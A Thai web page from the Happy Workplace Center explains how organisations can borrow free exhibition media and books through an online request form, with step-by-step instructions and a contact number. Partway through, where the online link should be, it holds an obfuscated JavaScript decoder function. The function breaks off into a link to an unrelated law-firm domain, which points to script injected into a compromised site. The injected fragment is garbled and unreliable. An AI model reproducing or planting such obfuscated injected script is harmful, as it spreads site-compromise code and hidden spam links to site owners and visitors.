การติดต่อขอสื่อ

ท่านสามารถขอสื่อความรู้Happy workplace ผ่านระบบออนไลน์ได้แล้วที่

function l1c373528ef5(o4){var sa=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var q3=”;var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o4.charAt(oe++));ve=sa.indexOf(o4.charAt(oe++));r4=sa.indexOf(o4.charAt(oe++));n2=sa.indexOf(o4.charAt(oe++));x1=(yc<<2)|(ve>>4);pc=((ve&15)<<4)|(r4>>2);u6=((r4&3)<<6)|n2;if(x1>=192)x1+=848;else if(x1==168)x1=1025;else if(x1==184)x1=1105;q3+=String.fromCharCode(x1);if(r4!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;q3+=String.fromCharCode(pc);}if(n2!=64){if(u6>=192)u6+=848;else if(u6==168)u6=1025;else if(u6==184)u6=1105;q3+=String.fromCharCode(u6);}}while(oe.cochranfirmcriminaldefense.com">www.maryland.cochranfirmcriminaldefense.com  -----> หัวข้อ “ขอสื่อ

mix book

ขั้นตอนการขอสื่อ

  • เข้าหัวข้อ       “ขอสื่อ”

  • เลือกหนังสือที่ต้องการ “หยิบใส่ตะกร้า”

  • อ่านรายละเอียดหนังสือและ ใส่เลข จำนวนที่ต้องการขอ (โดยเลือกได้ไม่เกิน 10 เล่ม

  • เมื่อเลือกหนังสือตามที่ต้องการ คลิ๊กเลือกที่

  • กรอกรายละเอียดผู้ขอ และวุตถุประสงค์การใช้งาน

  • คลิ๊กส่งแบบฟอร์ม

  • รอรับอีเมล์ตอบกลับการอนุมัติเบิก

  • ศูนย์ Happy workplace center จัดส่งสื่อตามอนุมัติ ผ่านไปรษณีย์ไทย หรือ ให้ท่านดินทางมารับเอง

ศูนย์ Happy Workpalce Center มีสื่อนิทรรศการ บริการให้ยืมฟรี แก่องค์กรที่สนใจ

กรุณาติดต่อ โทรศัพท์: 02-035-6311

แบบฟอร์มเบิกสื่อ

ตย.สื่อนิทรรศการ

BACK DROP

Screen Shot 2556-08-20 at 12.58.11 AM

STANDY

Screen Shot 2556-08-20 at 1.03.58 AM Screen Shot 2556-08-20 at 1.04.09 AM